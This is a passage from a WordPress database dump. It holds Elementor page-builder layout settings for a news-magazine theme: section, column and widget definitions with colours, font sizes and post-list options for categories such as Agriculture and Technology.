ed\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"someezc\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"width\":\"600\",\"height\":\"600\"},\"elements\":[],\"widgetType\":\"magzma-carousel-slider-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1202,438,'_elementor_version','0.4'),(1203,438,'_elementor_css','a:3:{s:4:\"time\";i:1508883121;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1205,439,'_elementor_edit_mode','builder'),(1206,439,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_ta